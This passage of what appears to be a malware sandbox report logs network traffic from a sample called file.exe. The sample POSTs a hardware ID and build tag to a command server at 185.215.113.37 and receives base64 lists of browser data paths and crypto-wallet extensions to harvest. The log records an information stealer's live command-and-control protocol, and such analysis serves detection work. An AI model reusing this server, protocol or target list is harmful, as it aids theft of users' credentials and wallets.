Oct 3, 2024 21:36:16.160988092 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161001921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.161009073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161020994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.161035061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161045074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.161058903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.161067009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161079884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161088943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.161098003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161109924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.161123037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161133051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.161143064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161165953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161412001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.161426067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.161439896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.161451101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161463976 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161472082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.161485910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161494017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.161504984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161515951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.161524057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161537886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.161550045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161561966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.161571026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161583900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.161593914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161607027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.161619902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161629915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.161650896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.161678076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.245148897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.245208025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.866852045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.866893053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:16.871939898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:16.871961117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:17.608968973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:17.609019995 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:17.666837931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:17.671819925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:17.892347097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:17.892359972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:17.892369032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:17.892448902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:17.892448902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:17.895565033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:17.900482893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:18.138001919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:18.138060093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:18.152721882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:18.160554886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:18.874660969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:18.874718904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:18.902930021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:18.907819033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:19.145370007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:19.145426035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:19.145428896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:19.145457983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:19.145467997 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:19.145490885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:19.145494938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:19.145529985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:19.145567894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:19.145598888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:19.145610094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:19.145644903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:19.147209883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:19.152048111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:19.979604959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:19.979734898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:24.888580084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:24.888708115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:26.471479893 CEST	49704	80	192.168.2.5	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.215.113.37	80	5008	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 21:36:02.999824047 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2024 21:36:03.701503038 CEST	203	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:03 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 21:36:03.705388069 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEG Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 34 46 46 30 36 35 32 45 30 36 31 34 33 37 37 38 38 36 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 2d 2d 0d 0a Data Ascii: ------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="hwid"B04FF0652E061437788654------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="build"doma------KFIDAFBFBKFHJJKEHIEG--
Oct 3, 2024 21:36:03.944286108 CEST	407	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:03 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 5a 6a 4d 32 4e 54 5a 69 4d 57 5a 6b 4d 6a 68 69 59 32 45 35 4f 54 63 33 5a 44 63 31 4e 7a 5a 68 59 54 4e 6c 5a 44 51 32 4e 6a 63 35 59 54 49 32 4d 7a 4a 6a 4e 47 55 79 59 57 4d 34 4e 44 49 77 4d 6d 45 32 59 57 4e 69 5a 57 45 78 4e 7a 59 7a 5a 54 41 30 5a 54 49 31 4e 44 56 6c 4e 54 59 34 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: ZjM2NTZiMWZkMjhiY2E5OTc3ZDc1NzZhYTNlZDQ2Njc5YTI2MzJjNGUyYWM4NDIwMmE2YWNiZWExNzYzZTA0ZTI1NDVlNTY4fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Oct 3, 2024 21:36:03.956386089 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJ Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="message"browsers------AEHIJKKFHIEGCBGCAFIJ--
Oct 3, 2024 21:36:04.180922031 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:04 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Oct 3, 2024 21:36:04.181068897 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Oct 3, 2024 21:36:04.182359934 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBA Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="message"plugins------BGDAAEHDHIIJKECBKEBA--
Oct 3, 2024 21:36:04.417290926 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:04 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Oct 3, 2024 21:36:04.417431116 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Oct 3, 2024 21:36:04.417447090 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Oct 3, 2024 21:36:04.418278933 CEST	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Oct 3, 2024 21:36:04.418288946 CEST	1236	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Oct 3, 2024 21:36:04.419086933 CEST	1164	IN	Data Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57 Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
Oct 3, 2024 21:36:04.420537949 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBGIJEHIIDGCFHIEGDGC Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 47 49 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 49 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 49 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 2d 2d 0d 0a Data Ascii: ------DBGIJEHIIDGCFHIEGDGCContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------DBGIJEHIIDGCFHIEGDGCContent-Disposition: form-data; name="message"fplugins------DBGIJEHIIDGCFHIEGDGC--
